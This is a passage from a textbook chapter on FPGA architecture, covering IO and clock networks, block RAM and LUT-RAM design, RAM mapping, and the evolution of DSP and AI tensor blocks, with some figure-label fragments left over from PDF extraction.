additional hardened digital circuitry to simplify capturing and transferring IO data
to the fabric. Generally, some or all of this hardened circuitry can be bypassed
by SRAM-controlled muxes, allowing FPGA users to choose which hardened
functions are desirable for a given design and IO protocol. Part 5 of Fig. 12
shows a number of common digital logic options on the IO input path: a capture
register, double-to-single data rate conversion registers (used with DDR memories),
and serial-to-parallel converters to allow transfers to the programmable fabric
operating at a lower frequency. Most FPGAs now also contain bypassable blocks
that connect to a group of IOs and implement higher-level protocols like DDR
memory controllers. Together these approaches allow the general-purpose FPGA
IOs to service many different protocols, at speeds up to 3.2 Gb/s.
The highest speed IOs implement serial protocols, such as PCIe and Ethernet,
that embed the clock in data transitions and can run at 28 Gb/s or more. To achieve
these speeds, FPGAs include a separate group of differential-only IOs that can only
be used as serial transceivers and have less voltage and electrical programmability
(Upadhyaya et al. 2016). Just as for the general-purpose IOs, these serial IOs have
a sequence of high-speed hardened circuits between them and the fabric, some of
which can be optionally bypassed to allow end-users to customize the exact interface
protocol.
Overall, FPGA IO design is very challenging, due to the dual (and competing)
demands to make the IO not only very fast but also programmable. In addition,
the rest of the FPGA fabric should also be designed appropriately to keep up with
the IO bandwidth; distributing the very high data bandwidths from IO interfaces
requires wide soft buses to be configured using the programmable routing and logic.
This creates additional challenges that will be discussed later in the “System-Level
Interconnect: Network-on-Chip” section.
13 Field-Programmable Gate Array Architecture 437
Since FPGA applications are often communicating with many different devices at
different speeds, they commonly include many different clock domains. Most of
these clocks are generated on-chip by programmable phase-locked loops (PLLs),
delay-locked loops (DLLs) and clock data recovery (CDR) circuits. Distributing that
many high-speed clocks to all the FFs on the chip using the general programmable
routing (discussed in the “Programmable Routing” section) would be extremely
challenging for several reasons:
1. Both the programmable routing architecture and the routing CAD algorithms
for general signals focus on optimizing delay and wire usage. However, routing
clock signals has a different objective: minimizing the clock skew (i.e., balancing
the delay) between different endpoints. While specialized low-skew routing CAD
algorithms have been devised, they still struggle to create balanced trees in
a general programmable interconnect that is not optimized for this case. The
difficulty increases for major system clocks, which can have fanouts of hundreds
of thousands of registers.
2. The programmable routing wires are optimized for density and speed rather than
minimal process variation, and this increases the uncertainty of clocks routed on
them, which in turn degrades timing. Another source of increased uncertainty
is the capacitive crosstalk between the densely spaced routing wires. A signal
(routed on an adjacent wire) toggling at the same time as the clock edge will add
significant clock jitter, degrading both setup and hold timing.
3. The very high toggle rate of clocks makes adding extra capacitance to their
routing highly undesirable, as it will have a significant power impact. The
inefficiency of the general routing wires in creating balanced trees due to both
extra switches and suboptimal switch patterns for this case will lead to higher
clock capacitance and power consumption.
Fig. 13 An example programmable clock distribution network similar to that of Stratix V FPGAs.
It has 16 chip-wide global H-trees (black), 16 smaller H-trees per quadrant (blue), and spine-and-
ribs leaf distribution (red)
these H-trees would add approximately one (wide and shielded) wire to each routing
channel.
Consequently, several techniques are commonly used to implement cheaper
clock distribution networks. Since not all clocks are needed everywhere on the chip,
some global (chip-wide) H-trees for major clock domains are built along with some
smaller ones that cover only portions (e.g., quadrants) of the chip as marked by 1
and 2 in Fig. 13, respectively. For example, fabricating 16 global and 16 quadrant
H-trees enables the use of up to 80 different clocks (16 clocks on the global networks
+ 4 × 16 clocks on the quadrant clocks) at a cost equivalent to that of only 32 global
H-trees. Additional wire savings are achieved by implementing the leaf wiring in
a spine-and-ribs style as indicated by 3 and 4 in Fig. 13 instead of continuing
the H-tree fractal pattern down to individual blocks. The last wire level in an
H-tree is called a spine clock and it drives several rib clocks that each span a fraction
of an FPGA row. The clock skew is tolerable as long as the spine and rib wires
are kept reasonably short. To further reduce the cost of the leaf wires (ribs) of the
clock network, programmable multiplexers are added to select only a portion of the
possible spine clock sources to be routed to the rib clocks that functional blocks
can access. In Fig. 13 for example, 32 clock trees are multiplexed down to 6 rib
clocks, reducing the expensive wiring at the leaves of the clock networks by 81%.
This multiplexing leads to a constraint: all the function blocks spanned by a rib
clock (1/8 of a row in many Altera/Intel FPGAs) must together use no more than
6 distinct clocks. This constraint is enforced automatically by the placement CAD
tool during optimization.
The most recent FPGAs have made clocking networks more flexible. In the
Intel Stratix 10 architecture, the FPGA chip is divided into clock sectors where
13 Field-Programmable Gate Array Architecture 439
a b
Fig. 14 (a) Routable clock networks in Intel Stratix 10 and (b) Spine clock control in Xilinx
Ultrascale+
On-chip Memory
FFs in logic blocks were the first storage elements to be integrated into FPGAs, as
described in the “Programmable Logic Blocks” section. However, as FPGA logic
capacity grew, they were used to implement more complex systems which almost
440 A. Boutros and V. Betz
always require memory to buffer and re-use data. This motivated more on-chip
storage options, since building large RAMs out of registers and LUTs is over 100×
less dense than a dedicated SRAM memory array. At the same time, the memory
requirements of applications implemented on FPGAs are very diverse, including
(but not limited to) small coefficient storage RAMs for FIR filters, large buffers
for network packets, caches and register files for processor-like modules, read-
only memory for instructions, and FIFOs of myriad sizes to decouple computation
modules. This means that there is no single RAM configuration (capacity, word
width, number of ports) that can satisfy the needs of all FPGA designs, making it
challenging to decide on what kind(s) of RAM blocks should be added to an FPGA
such that they are efficient for a broad range of uses. The first FPGA to include hard
functional blocks for memory (block RAMs or BRAMs) was the Altera Flex 10 K in
1995. It included columns of small (2 Kb) BRAMs that connect to the rest of the
fabric through the programmable routing. Since then, the capacity and diversity of
FPGA on-chip memories have been gradually increasing and it is typical for ∼25%
of the area of a modern FPGA to be consumed by BRAM tiles (including their
programmable routing) (Tatsumura et al. 2016).
Figure 15 illustrates the organization of an SRAM-based BRAM. An FPGA
BRAM consists of a traditional SRAM memory array at its core, with additional
peripheral circuitry that makes them configurable for different purposes and
provides flexible connectivity to the programmable routing. The core memory array
consists of a two-dimensional array of SRAM cells to store bits, and a considerable
amount of peripheral circuitry to orchestrate access to these cells for read/write
operations. To simplify timing of the read and write operations, all modern FPGA
BRAMs register all their inputs; they also include output registers, but these are
configurable and can be bypassed. During a write operation, the column decoder
activates the write drivers (W D), which in turn charge the bitlines (BL and BL)
according to the input data to-be-written to the memory cells. Simultaneously, the
row decoder activates the wordline (W L) of the row specified by the input write
address, connecting one row of cells to their bitlines so they are overwritten with
new data. During a read operation, both the BL and BL are pre-charged high and
then the row decoder activates the wordline of the row specified by the input read
address. The contents of the activated cells cause a slight difference in the voltage
between BL and BL, which is sensed and amplified by the sense amplifier (SA)
circuit to produce the output data (Tatsumura et al. 2016).
BRAM capacity, data word width, and number of read/write ports are all key
architectural parameters. More capable BRAMs cost more silicon area, so architects
must carefully balance BRAM design choices while taking into account the most
common use cases in application circuits. For example, the area occupied by the
memory cells grows linearly with the capacity of the BRAM, but the area of the
peripheral circuitry and the number of routing ports grows sub-linearly. This means
that larger BRAMs have lower area per bit, making large on-chip buffers more
efficient. On the other hand, if an application requires only small RAMs, much
of the capacity of a larger BRAM may be left unused. Similarly, a BRAM with a
13 Field-Programmable Gate Array Architecture 441
CS
Vdd On switch
Off switch
ExtAddr
SB
W
W
ExtAddrA Output Crossbar RdataA
W CSL Dout
log2(W)
WCnfg
Sense Amplifier
Local Crossbar
Dec.
Sen
WenA
W SA SA SA SA SA SA SA SA
Wen
WdataA Din WD WD WD WD WD WD WD WD
W BL BL BL BL BL BL BL BL
WL0A
Row Dec. A
Row Dec. B
WL1A
AddrA
log2(D)
WL2A SRAM Cells Din
Write Driver
log2(D)+ WL3A
log2(W)+
W+1
CB
Read/Write Circuitry B
BLA BLA
BLB BLB Wen
WLA
General-purpose Routing
WLB
BLA BLA
Fig. 15 Organization and circuitry of a conventional dual-port SRAM-based FPGA BRAM. The
components highlighted in blue are common in any SRAM-based memory module, while those
highlighted in green are FPGA-specific. This BRAM has a maximum data width of 8 bits, but the
output crossbar is configured for 4-bit output mode
larger data width can provide higher data bandwidth to downstream logic. However,
it costs more area than a BRAM with the same capacity but a smaller word width,
as the larger data word width necessitates more sense amplifiers, write drivers and
programmable routing ports. Finally, increasing the number of read/write ports to
a BRAM increases the area of both the SRAM cells and the peripheral circuitry,
but again increases the data bandwidth the BRAM can provide and allows more
diverse uses. For example, FIFOs (which are ubiquitous in FPGA designs) require
both a read and a write port. The implementation details of a dual-port SRAM cell
is shown at the bottom of Fig. 15. Implementing a second port to the SRAM cell
(port B highlighted in red) adds two transistors, increasing the area of the SRAM
cells by 33%. In addition, the second port also needs an additional copy of the sense
amplifiers, write drivers and row decoders (the “Read/Write Circuitry B” and “Row
Decoder B” blocks in Fig. 15). If both ports are read/write (r/w), we also have to
double the number of ports to the programmable routing.
442 A. Boutros and V. Betz
Because the FPGA on-chip memory must satisfy the needs of every application
implemented on that FPGA, it is also common to add extra configurability to
BRAMs to allow them to adapt to application needs (Wilton et al. 1995). FPGA
BRAMs are designed to have configurable width and depth by adding low-cost
multiplexing circuitry to the peripherals of the memory array. For example, in
Fig. 15 the actual SRAM array is implemented as a 4×8-bit array, meaning it
naturally stores 8-bit data words. By adding multiplexers controlled by 3 address
bits to the output crossbar, and extra decoding and enabling logic to the read/write
circuitry, this RAM can also operate in 8×4-bit, 16×2-bit or 32×1-bit modes. The
multipliexers in the width configurability decoder(“WCnfg Dec.” in Fig. 15) select
between Vdd and address bits to implement configurable width of between 1 and 8
bits per word for example. The multiplexers are programmed using configuration
SRAM cells and are used to generate column select (CS) and write enable (W en)
signals that control the sense amplifiers and write drivers for narrow read and write
operations, respectively. For typical BRAM sizes (several Kb or more), the cost
of this additional width configurability circuitry is small compared to the cost of a
conventional SRAM array and it does not require any additional costly routing ports.
Another unique component of the FPGA BRAMs compared to conventional
memory blocks is their interface to the programmable routing fabric. This interface
is generally designed to be similar to that of the logic blocks described in
the “Programmable Logic Blocks” section; it is easier to create a routing architecture
that balances flexibility and cost well if all block types connect to it in similar
ways. Connection block multiplexers, followed by local crossbars in some FPGAs,
form the BRAM input routing ports, while the read outputs drive switch block
multiplexers to form the output routing ports. These routing interfaces are costly,
particularly for small BRAMs; they constitute 5% of the area of 256 Kb BRAM
tiles, and this portion grows to 35% for smaller 8 Kb BRAMs (Yazdanshenas et al.
2017). This motivates minimizing the number of routing ports to a BRAM as much
as possible without unduly comprising its functionality. Table 2 summarizes the
number of routing ports required for different numbers and types of BRAM read and
write ports. For example, a single-port BRAM (1r/w) requires W + log2 (D) input
ports for write data and read/write address, and W output ports for read data, where
W and D are the maximum word width and the BRAM depth, respectively. The
table shows that a true dual-port (2r/w) BRAM requires 2W more ports compared
to a simple dual-port (1r+1w) BRAM, which significantly increases the cost of the
routing interfaces. While true dual-port memory is useful for register files, caches
and shared memory switches, the most common use of multi-ported RAMs on
FPGAs is for FIFOs, which require only one read and one write port (1r+1w rather
than 2r/w ports). Consequently, FPGA BRAMs typically have true dual-port SRAM
cores but with only enough routing interfaces for simple-dual port mode at the full
width supported by the SRAM core (W ), and limit the width of the true-dual port
mode to only half of the maximum width (W/2).
Another way to mitigate the cost of additional BRAM ports is to multi-pump the
memory blocks by operating the BRAMs at a frequency that is a multiple of that
used for the rest of the design logic. By doing so, a physically single-ported SRAM
array can implement a logically multi-ported BRAM without the cost of additional
ports as in Tabula’s Spacetime architecture (Halfhill 2010). Multi-pumping can
also be used with conventional FPGA BRAMs by building the time-multiplexing
logic in the soft fabric (LaForest et al. 2012); however, this leads to aggressive
timing constraints for the time-multiplexing logic, which can make timing closure
more challenging and increase compile time. For example, Ahmed et al. (2019)
showed that careful design partitioning, floorplanning and iterative compilation are
necessary for meeting timing on the time-multiplexing logic especially when using
a large number of multi-pumped BRAMs. Altera introduced quad-port BRAMs in
its Mercury devices in the early 2000s to make shared memory switches (useful in
packet processing) and register files more efficent. However, this feature increased
the BRAM size and was not sufficiently used to justify its inclusion in subsequent
FPGA generations. Instead designers use a variety of techniques to combine dual-
ported FPGA BRAMs and soft logic to make highly-ported structures when needed,
albeit at lower efficiency (LaForest et al. 2012). We refer the interested reader to both
Tatsumura et al. (2016) and Yazdanshenas et al. (2017) for extensive details about
the design of BRAM core and peripheral circuitry.
In addtition to BRAMs, most FPGAs can re-use at least some of their LUTs
as memory. The truth tables in the logic block K-LUTs are 2K ×1-bit read-only
memories; they are written once by the configuration circuitry when the design
bitstream is loaded. Since LUTs already have read circuitry (read out a stored
value based on a K-bit input/address), they can be used as small LUT-based
RAMs (LUT-RAMs) just by adding low-cost designer-controlled write circuitry.
However, a major concern is the number of additional routing ports necessary to
implement the write functionality to change a LUT to a LUT-RAM. For example, an
ALM in recent Altera/Intel architectures is a 6-LUT that can be fractured into two
5-LUTs and has 8 input routing ports, as explained in the “Programmable Logic
Blocks” section. This means it can operate as a 64×1-bit or a 32×2-bit memory
with 6 or 5 bits for read address, respectively. This leaves only 2 or 3 unused
routing ports, which are not enough for write address, data, and write enable (8
total signals) if we want to read and write in each cycle (simple dual-port mode),
which is the most commonly used RAM mode in FPGA designs. To overcome
this problem, an entire logic block of 10 ALMs is configured as a LUT-RAM to
amortize the control circuitry and address bits across 10 ALMs. The write address
and write enable signals are assembled by stealing a single unused routing port
444 A. Boutros and V. Betz
from each ALM and broadcasting the resulting address and enable to all the ALMs
in a logic block (Lewis et al. 2009). Consequently, a logic block can implement a
64×10-bit or 32×20-bit simple dual-port RAM, but has a restriction that a single
logic block cannot mix logic and LUT-RAM. Xilinx Ultrascale similarly converts
an entire logic block to LUT-RAM, but all the routing ports of one out of the eight
LUTs in a logic block are repurposed to drive the shared write address and enable
signals. Therefore, a Xilinx logic block can implement a 64×7-bit or 32×14-bit
simple dual-port RAM, or a slightly wider single-port RAM (64×8-bit or 32×
16-bit). Avoiding extra routing ports keeps the cost of LUT-RAM low, but it still
adds some area. Since it would be very unusual for a design to use more than
50% of the logic fabric as LUT-RAMs, both Altera/Intel and Xilinx have elected
to make only half (or less) of their logic blocks LUT-RAM capable in their recent
architectures, thereby further reducing the area cost.
Designers require many different RAMs in a typical design, all of which must
be implemented by the fixed BRAM and LUT-RAM resources on the chip. Forcing
designers to determine the best way to combine BRAM and LUT-RAM for each
memory configuration they need and writing Verilog to implement them would
be laborious and would also impede migration of the design to a new FPGA
architecture. Instead, the vendor CAD tools include a RAM mapping stage that
implements the logical memories in the user’s design using the physical BRAMs
and LUT-RAMs on the chip. The RAM mapper chooses the physical memory
implementation (i.e., memory type and the width/number/type of its ports) and
generates any additional logic required to combine multiple BRAMs or LUT-RAMs
to implement each logical RAM. An example of mapping a logical 2048×32-bit
RAM with 2 read and 1 write ports to an FPGA with physical 1024×8-bit dual-
port BRAMs is illustrated in Fig. 16. First, four physical BRAMs are combined in
parallel to make wider RAMs with no extra logic. Then, soft logic resources are
used to perform depth-wise stitching of two sets of four physical BRAMs, such that
1024 words
RAddr0 RAddr1
[9:0] [9:0]
WAddr WAddr
RAddr0 [9:0] [9:0]
[10:0] Wen
Wen
WAddr[10] WAddr[10]
RAddr1
2048 words
[10:0] Rdata0
[31:0] Wdata 8 8 8 8 Rdata0 Wdata 8 8 8 8 Rdata1
WAddr [31:0] [31:0] [31:0] [31:0]
8 8 8 8 8 8 8 8
[10:0] Rdata1
Wdata [31:0]
1024 words
1024 words
RAddr0 RAddr1
[31:0] RAddr0[10] RAddr1[10]
[9:0] [9:0]
WAddr WAddr
Wen [9:0] [9:0]
Wen Wen
WAddr[10] WAddr[10]
8b 8b 8b 8b 8b 8b 8b 8b
Fig. 16 Mapping a 2048×32-bit 2r+1w logical RAM to an FPGA with 1024×8-bit 1r+1w
physical BRAMs
13 Field-Programmable Gate Array Architecture 445
Fig. 17 Memory bits per logic elements for different generations of Altera/Intel FPGAs starting
from the 350 nm Flex 10K (1995) to the 10 nm Agilex (2019) architecture. FPGA on-chip memory
density has increased by a factor of 16× in the last 25 years. The labels show the sizes of BRAMs
in each generation
the most-significant bits of the write and read addresses are used as write enable
and read output multiplexer select signals, respectively. Finally, in this case, we
require two read ports and one write port while the physical BRAMs only support a
maximum of 2r/w ports. To implement the second read port, the whole structure is
either replicated as shown in the figure or double-pumped as previously explained.
Several algorithms for optimizing RAM mapping are described in Tessier et al.
(2007) and Lai and Lin (2016).
Over the past 25 years, FPGA memory architecture has evolved considerably
and has also become increasingly important, as the ratio of memory to logic on an
FPGA die has grown significantly. Figure 17 plots the memory bits per logic element
(including LUT-RAM) versus the number of logic elements in Altera/Intel devices
starting from the 350 nm Flex 10K devices (1995) to 10 nm Agilex devices (2019).
There has been a gradual increase in the memory richness of FPGAs over time, and
to meet the demand for more bits at a cheaper cost, modern BRAMs have larger
capacities (20 Kb) than the first BRAMs (2 Kb). Some FPGAs have had highly
heterogeneous BRAM architectures in order to provide some physical RAMs that
are efficient for small or wide logical RAMs, and others that are efficient for large
and relatively narrow logical RAMs. For example, Stratix (130 nm) had 3 types of
BRAM, with capacities of 512 b, 4 Kb and 512 Kb. The introduction of LUT-RAM
in Stratix III (65 nm) reduced the need for small BRAMs, so it moved to a memory
architecture with only medium and large size (9 Kb and 144 Kb) BRAMs. Stratix V
(28 nm) and later Intel devices have moved to a combination of LUT-RAM and a
single medium-sized BRAM (20 Kb) to simplify both the FPGA layout as well as
RAM mapping and placement. A similar trend can be observed in Xilinx devices
(Tatsumura et al. 2016); Xilinx’s RAM architecture also combines LUT-RAM and a
446 A. Boutros and V. Betz
medium-sized 18 Kb RAM, but also includes hard circuitry to combine two BRAMs
into a single 36 Kb block. However, Xilinx’s most recent devices add a large 288 Kb
BRAM (UltraRAM) to be more efficient for very large buffers, showing that there
is still no general agreement on the best BRAM architecture. Some recent Intel
devices further enhance their memory capacity by integrating the FPGA fabric with
one or more embedded SRAM (eSRAM) chiplets using interposer technology that
will be discussed in the “Interposers” section later. Each eSRAM chiplet implements
eight large simple dual-port memories with a combined capacity of 47 Mb in Stratix
10 and 18 Mb in Agilex. These memories are ideal for wide and deep buffers that
exceed on-chip storage capacity, but benefit from reduced latency; for example,
routing tables or packet headers in networking applications.
To give some insight into the relative areas and efficiencies of different BRAMs,
Table 3 shows the resource usage, silicon area, and frequency of a 2048×72-bit
logical RAM when it is implemented by Quartus (the CAD flow for Altera/Intel
FPGAs) in a variety of ways on a Stratix IV device. The silicon areas are computed
using the published Stratix III block areas from Wong et al. (2011) and scaling them
from 65 nm down to 40 nm, as Stratix III and IV have the same architecture but use
different process nodes. As this logical RAM is a perfect fit to the 144 Kb BRAM
in Stratix IV, it achieves the best area when mapped to a single 144 Kb BRAM.
Interestingly, mapping to eighteen 9 Kb BRAMs is only 1.9× larger in silicon
area (note that output width limitations lead to 18 BRAMs instead of the 16 one
might expect). The 9 Kb BRAM implementation is actually faster than the 144 Kb
BRAM implementation, as the smaller BRAMs have higher maximum operating
frequencies. Mapping such a large logical RAM to LUT-RAMs is inefficient,
requiring 12.7× more area and running at 40% of the frequency. Finally, mapping
only to the logic and routing resources highlights the importance of BRAMs; the
area is over 300× larger than the 144 Kb BRAM implementation. While the 144 Kb
BRAM is most efficient for this single test case, real designs have diverse logical
RAMs, and for small or shallow memories the 9 Kb and LUT-RAM options would
outperform the 144 Kb BRAM, motivating a diversity of on-chip RAM resources.
To choose the best mix of BRAM sizes and maximum word widths, one needs both
a RAM mapping tool and tools to estimate the area, speed and power of each BRAM
(Yazdanshenas et al. 2017). Published studies into BRAM architecture trade-offs for
FPGAs include (Yazdanshenas et al. 2017; Lewis et al. 2013).
Until now, all commercial FPGAs use only SRAM-based memory cells in their
BRAMs. With the desire for more dense BRAMs that would enable more memory-
Table 3 Implementation results for a 2048×72-bit 1r+1w RAM using BRAMs, LUT-RAMs and
registers on Stratix IV
BRAMs
Implementation Half-ALMs 9K 144K Area (mm2 ) Freq. (MHz)
144K BRAMs 0 0 1 0.22 (1.0×) 336 (1.0×)
9K BRAMs 0 18 0 0.41 (1.9×) 497 (1.5×)
LUT-RAM 6597 0 0 2.81 (12.8×) 134 (0.4×)
Registers 165155 0 0 68.8 (313×) 129 (0.4×)
13 Field-Programmable Gate Array Architecture 447
rich FPGAs and SRAM scaling becoming increasingly difficult due to process
variation, a few academic studies have explored the use of other emerging memory
technologies such as magnetic tunnel junctions (MTJs) to build FPGA memory
blocks. According to Tatsumura et al. (2016), MTJ-based BRAMs could increase
the FPGA memory capacity by up to 2.95× with the same die size; however, they
would increase the process complexity.
DSP Blocks
Fig. 18 DSP block evolution in Altera/Intel and Xilinx FPGAs. Incrementally added features are
highlighted in red
A1 A0
Input A
B0
Input B
B1
Output
A1 x B1 A0 x B0
Fig. 19 Fracturing an 18×18 multiplier array into two 9×9 arrays with the same number of
input/output ports
In addition to the fracturable multiplier arrays, the Stratix DSP also incorporated
an adder/output block to perform summation and accumulation operations, as well
as hardened input registers that could be configured as shift registers with dedicated
cascade interconnect between them to implement efficient FIR filter structures.
Xilinx also adopted a fully-featured DSP block approach by introducing their
DSP48 tiles in the Virtex-4 architecture. Each DSP tile had two fixed-precision
18×18 bit multipliers with similar functionalities to the Stratix DSP block (e.g.,
input cascades, adder/subtractor/accumulator). Virtex-4 also introduced the ability
to cascade the adders/accumulators using dedicated interconnects on the output
side of the DSP blocks to implement high-speed systolic FIR filters with hardened
reduction chains.
An N-tap FIR filter performs a discrete 1D convolution between the samples of
a signal X = {x0 , x1 , . . . , xT } and certain coefficients C = {c0 , c1 , . . . , cN −1 } that
represent the impulse response of the desired filter, as shown in Eq. (1).
N
yn = c0 xn + c1 xn−1 + . . . + cN xn−N = ci xn−i (1)
i=0
Many of the FIR filters used in practice are symmetric with ci = cN −i , for i = 0 to
N/2. As a result of this symmetry, the filter computation can be refactored as shown
in Eq. (2).
C0 C1 C2 C3
Figure 20 shows the structure of a systolic symmetric FIR filter circuit, which is
a key use case for FPGAs in wireless base stations. Both Stratix and Virtex-4 DSP
blocks can implement the portions highlighted by the dotted boxes, resulting in sig-
nificant efficiency gains compared to implementing them in the FPGA’s soft logic.
Interestingly, while FPGA CAD tools will automatically implement a multiplication
operation (written as a * operator in RTL) in DSP blocks, they will generally not
make use of any of the advanced DSP block features (e.g., accumulation, systolic
registers for FIR filters) unless a designer manually instantiates a vendor-supplied
DSP block IP in the proper mode. Consequently, using the more powerful DSP
block features makes a design less portable when migrating to another FPGA with
different DSP block capabilities. Some work has extended automatic DSP block
inference to sequences of multiply, add and subtract operations in RTL that exactly
match the DSP block capabities (Ronak and Fahmy 2015a). This can improve
automatic inference to some extent, but it will be difficult to extend to fully utilize
advanced DSP block features like coefficient re-use networks.
The Stratix III/IV DSP block was similar to the Stratix II one but could
implement four 18×18 multipliers per half a DSP block (instead of two) if their
results are summed to limit the number of output routing interfaces. Table 4 lists the
implementation results of both symmetric and asymmetric 51-tap 16-bit FIR filters,
with and without using the hard DSP blocks on a Stratix IV device. When DSP
blocks are not used, we experiment with two different cases: fixed filter coefficients,
and filter coefficients that can change at runtime. If the filter coefficients are fixed,
the multiplier arrays implemented in the soft logic are optimized by synthesizing
away parts of the partial product generation logic that correspond to zero bits
in the coefficient values. Hence, it has lower resource utilization than with input
coefficients that can change at runtime. For the symmetric filter, even when using
the DSP blocks, we still need to use some soft logic resources to implement the
input cascade chains and pre-adders, as shown in Fig. 20. Using the hard DSP
blocks results in 3× higher area efficiency vs. using the soft fabric in the case of
fixed coefficients. This gap grows to 6.2× for filter coefficients that are changeable
during runtime. For the asymmetric filter, the complete FIR filter structure can
be implemented in the DSP blocks without any soft logic resources. Thus, the
13 Field-Programmable Gate Array Architecture 451
Table 4 Implementation results for a 51-tap 16-bit FIR filter on Stratix IV with and without using
the hardened DSP blocks
Symmetric Filter
Implementation Half-ALMs DSPs Area (mm2 ) Freq. (MHz)
With DSPs 403 3 28 0.49 (1.0×) 510 (1.0×)
Without DSPs 3505 0 1.46 (3.0×) 248 (0.5×)
(fixed coeff.)
Without DSPs 7238 0 3.01 (6.2×) 220 (0.4×)
(variable coeff.)
Asymmetric Filter
Implementation half-ALMs DSPs Area (mm2 ) Freq. (MHz)
With DSPs 0 6 38 0.63 (1.0×) 510 (1.0×)
Without DSPs 5975 0 2.48 (3.9×) 245 (0.5×)
(fixed coeff.)
Without DSPs 12867 0 5.35 (8.5×) 217 (0.4×)
(variable coeff.)
area efficiency gap increases to 3.9× and 8.5× for fixed and variable coefficients,
respectively. These gains are large but still less than the 35× gap between FPGAs
and ASICs (Kuon and Rose 2007) usually cited in academia. The difference is
partly due to some soft logic remaining in most application circuits, but even in
the case where the FIR filter perfectly fits into DSP blocks with no soft logic,
the area reduction hits a maximum of 8.5×. The primary reasons for the lower
than 35× gain of Kuon and Rose (2007) are the interfaces to the programmable
routing and the general inter-tile programmable routing wires and muxes that must
be implemented in the DSP tile. In all cases, using the hard DSP blocks results in
about 2× frequency improvement as shown in Table 4. Similarly to BRAMs, the
high operating frequencies of DSP blocks mean they can often be multi-pumped
(run at a multiple of the soft logic frequency); this is mainly used for resource
reduction in DSP-bound designs as in Ronak and Fahmy (2015b).
The next few FPGA architecture generations from both Altera and Xilinx
witnessed only minor changes in the DSP block architecture. The main focus of
both vendors was to fine-tune the DSP block capabilities for emerging application
domains without adding costly programmable routing interfaces. In Stratix V, the
DSP block was greatly simplified to natively support two 18×18 bit multiplications
(suitable for signal processing) or one 27×27 multiplication (suitable for single-
precision floating-point mantissa multiplication). As a result, the simpler Stratix V
DSP block spanned a single row, which is more friendly to Altera’s row redundancy
scheme (i.e., the ability to skip single FPGA rows with fabrication faults in them
to increase the effective yield). In addition, input pre-adders as well as embedded
coefficient banks to store read-only filter weights were added, which allowed
implementation of the whole symmetric FIR filter structure shown in Fig. 20 inside
the DSP blocks without the need for any soft logic resources. Xilinx followed a
similar path in incorporating 27×18 multiplication with support for pre-adders in
Virtex-6 DSP blocks.
452 A. Boutros and V. Betz
As shown in Fig. 18, Xilinx DSP blocks since Virtex-5 have incorporated an
ALU that can perform logic operations as well as add and subtract; both the ALU
operation and the data paths through the DSP are selected by additional inputs so
they can change dynamically from cycle to cycle. This enhancement makes these
DSP blocks well suited for the datapath of a soft processor (Cheah et al. 2014).
Controlling DSP operations dynamically in this manner increases the flexibility of
the block, but has some area cost as adding routing input ports for dynamic control
signals is more expensive than adding configuration SRAM cells to statically select
operations.
As illustrated in Fig. 18, up to 2009 the evolution of the DSP block archi-
tecture was mainly driven by the precisions and requirements of communication
applications, especially in wireless base stations, with very few academic research
explorations. With the large-scale deployment of FPGAs in datacenters and the
emergence of DL as a key component of many applications both in datacenter and
edge workloads, the DSP block architecture has evolved in two different directions.
The first direction targets the high-performance computing (HPC) domain by adding
native support for single-precision floating-point (fp32) multiplication. Before
that, FPGA vendors would supply designers with IP cores that implement floating-
point arithmetic out of fixed-point DSPs and a considerable amount of soft logic
resources. This created a major barrier for FPGAs to compete with CPUs and GPUs
(which have dedicated floating-point units) in the HPC domain. Native floating-
point capabilities were first introduced in Intel’s Arria 10 architecture, with a key
design goal of avoiding a large increase in DSP block area (Langhammer and Pasca
2015). By reusing the same interface to the programmable routing, not supporting
uncommon features like subnormals, flags and multiple rounding schemes, and
maximizing the reuse of existing fixed-point hardware, the block area increase was
limited to only 10% (which translates to 0.5% total die area increase). Floating-point
capabilities are supported in all subsequent generations of Intel FPGAs and in the
DSP58 tiles of the Xilinx Versal architecture (Gaide et al. 2019).
The second direction targets increasing the density of low-precision integer
multiplication specifically for DL inference workloads. Prior work has demonstrated
the use of low-precision fixed-point arithmetic (8-bit and below) instead of fp32
at negligible or no accuracy degradation, but greatly reduced hardware cost (Wang
et al. 2019). However, the required precision is model-dependent and can even vary
between different layers of the same model. As a result, FPGAs have emerged as
an attractive solution for DL inference due to their ability to implement custom
precision datapaths. This has led both academic researchers and FPGA vendors to
investigate adding native support for low-precision multiplication to DSP blocks.
Boutros et al. (2018) enhanced the fracturability of an Intel-like DSP block to
support more int9 and int4 multiply and MAC operations, while keeping the
same DSP block routing interface and ensuring its backward compatibility. The
proposed DSP block could implement four int9 and eight int4 multiply/MAC
operations along with Arria-10-like DSP block functionality at the cost of 12%
DSP block area increase, which is equivalent to only 0.6% increase in total die
area. This DSP block increased the performance of 8-bit and 4-bit DL accelerators
13 Field-Programmable Gate Array Architecture 453
by 1.3× and 1.6× while reducing the utilized FPGA resources by 15% and 30%
respectively, compared to an FPGA with DSPs that do not natively support these
modes of operation. Another academic work (Rasoulinezhad et al. 2019) enhanced
a Xilinx-like DSP block by including a fracturable multiplier array instead of the
fixed-precision multiplier in the DSP48E2 block to support int9, int4 and int2
precisions. It also added a FIFO register file and special dedicated interconnect
between DSP blocks to enable more efficient standard, point-wise and depth-wise
convolution layers. Shortly after, the Intel Agilex DSP block added support for
an int9 mode of operation along with half-precision floating-point (fp16) and
brain float (bfloat16) precisions as well. Also, the Xilinx Versal architecture
now natively supports int8 multiplications in its DSP58 tiles (Gaide et al. 2019).
Throughout the years, the DSP block architecture has evolved to best suit the
requirements of key application domains of FPGAs, and provide higher flexibility
such that many different applications can benefit from its capabilities. The common
focus across all the steps of this evolution was reusing multiplier arrays and routing
ports as much as possible to best utilize both these costly resources. However,
this becomes harder with the recent divergence in the DSP block requirements
of key FPGA application domains between high-precision floating-point in HPC,
medium-precision fixed-point in communications, and low-precision fixed-point in
DL. As a result, Intel introduced its first domain-specialized FPGA optimized for
artificial intelligence (AI) workloads, the Stratix 10 NX. This new FPGA replaces
conventional DSP blocks with AI tensor blocks (Langhammer et al. 2021). The
tensor blocks drop the support for legacy DSP modes and precisions that were
targeting the communications domain and adopt new ones targeting the DL domain
specifically. This tensor block significantly increases the number of int8 and int4
MACs to 30 and 60 per block respectively, at almost the same die size. Feeding
all multipliers with inputs without adding more routing ports is a key concern.
Accordingly, the NX tensor block introduces a double-buffered data reuse register
network that can be sequentially loaded from a smaller number of routing ports,
while allowing common DL compute patterns to make the best use of all available
multipliers. Recent work has shown that the Stratix 10 NX with tensor blocks can
deliver an average 3.5× performance boost compared to FPGAs with conventional
DSP blocks for real-time DL inference workloads (Boutros et al. 2020).
Processor Subsystems
a c d
